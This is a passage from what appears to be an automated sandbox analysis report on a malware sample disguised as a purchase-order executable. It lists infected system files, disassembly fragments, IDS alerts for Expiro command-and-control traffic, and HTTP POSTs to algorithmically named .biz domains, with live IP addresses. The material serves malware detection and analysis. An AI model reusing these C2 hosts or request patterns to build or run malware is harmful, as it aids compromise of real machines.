                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00446CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00446CA9
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_004460DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_004460DD
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_004463F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_004463F9
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0044EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0044EB60
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0044F56F FindFirstFileW,FindClose,0_2_0044F56F
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0044F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0044F5FA
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00451B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00451B2F
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00451C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00451C8A
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00451F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00451F94
                        Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 009E7394h14_2_009E7099
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 009E78DCh14_2_009E767A
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h14_2_009E7E60
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h14_2_009E7E5F
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h14_2_009E7FBC
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 014F9731h15_2_014F9480
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 014F9E5Ah15_2_014F9A30
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 014F9E5Ah15_2_014F9D87
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 05CF62B5h15_2_05CF60D8
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 05CF6C3Fh15_2_05CF60D8
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 05CF18A0h15_2_05CF15F8
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 05CF3840h15_2_05CF3598
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 05CF0740h15_2_05CF0498
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 05CF26E0h15_2_05CF2438
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 05CF49A0h15_2_05CF46F8
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h15_2_05CF51D8
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 05CF1448h15_2_05CF11A0
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 05CF33E8h15_2_05CF3140
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 05CF02E8h15_2_05CF0040
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then mov esp, ebp15_2_05CF93F0
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 05CF4548h15_2_05CF42A0
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 05CF0FF0h15_2_05CF0D48
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 05CF2F90h15_2_05CF2CE8
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 05CF2152h15_2_05CF1EA8
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 05CF40F0h15_2_05CF3E48
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h15_2_05CF59FB
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 05CF3C98h15_2_05CF39F0
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 05CF0B98h15_2_05CF08F0
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 05CF2B38h15_2_05CF2890
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h15_2_05CF581B
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 05CF4DF8h15_2_05CF4B50
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 4x nop then jmp 05CF1CF8h15_2_05CF1A50

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.5:50806 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.5:54833 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:49705 -> 54.244.188.177:80
                        Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:49833 -> 82.112.184.197:80
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                        Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
                        Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                        Source: unknownDNS query: name: checkip.dyndns.org
                        Source: unknownDNS query: name: reallyfreegeoip.org
                        Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.5:49705
                        Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.5:49705
                        Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.5:49717
                        Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.5:49717
                        Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.5:49711
                        Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.5:49711
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49710 -> 132.226.8.169:80
                        Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.5:49935
                        Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.5:49935
                        Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.5:49971
                        Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.5:49971
                        Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.5:49942
                        Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.5:49942
                        Source: global trafficHTTP traffic detected: POST /tp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /fowvjqhq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                        Source: global trafficHTTP traffic detected: POST /pmxflidirkcbpvm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /ygrk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                        Source: global trafficHTTP traffic detected: POST /ncgaeohbois HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /xmmfsweyvhue HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: POST /hvtqtjugbboqpm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /tohnhxnrpjse HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /ksmybghbmbq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 830
                        Source: global trafficHTTP traffic detected: POST /ywaoqfakpesqv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /uqppkasccjtxk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 830
                        Source: global trafficHTTP traffic detected: POST /svftqsgvqnih HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /ecjuuqdshncew HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /fgjkxxt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /dpxeblwuppuirbnx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /wjxiioeyplqiis HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /jlhpxxcq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /xyvnmtdiyfgocm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /lyroetjkhx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /dydgtoryupjgtl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /mhwavs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /ho HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49712 version: TLS 1.0
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00454EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00454EB5
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                        Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                        Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
                        Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                        Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
                        Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                        Source: global trafficDNS traffic detected: DNS query: przvgke.biz
                        Source: global trafficDNS traffic detected: DNS query: zlenh.biz
                        Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
                        Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
                        Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
                        Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
                        Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
                        Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
                        Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
                        Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
                        Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
                        Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
                        Source: global trafficDNS traffic detected: DNS query: tbjrpv.biz
                        Source: global trafficDNS traffic detected: DNS query: deoci.biz
                        Source: unknownHTTP traffic detected: POST /tp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: Grinnellia.exe, 00000016.00000002.2249712826.0000000000B18000.00000004.00000020.00020000.00000000.sdmp, Grinnellia.exe, 00000016.00000002.2250241974.0000000000B5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/
                        Source: alg.exe, 00000003.00000003.2124461247.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/F
                        Source: Grinnellia.exe, 00000016.00000002.2250241974.0000000000B5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/M
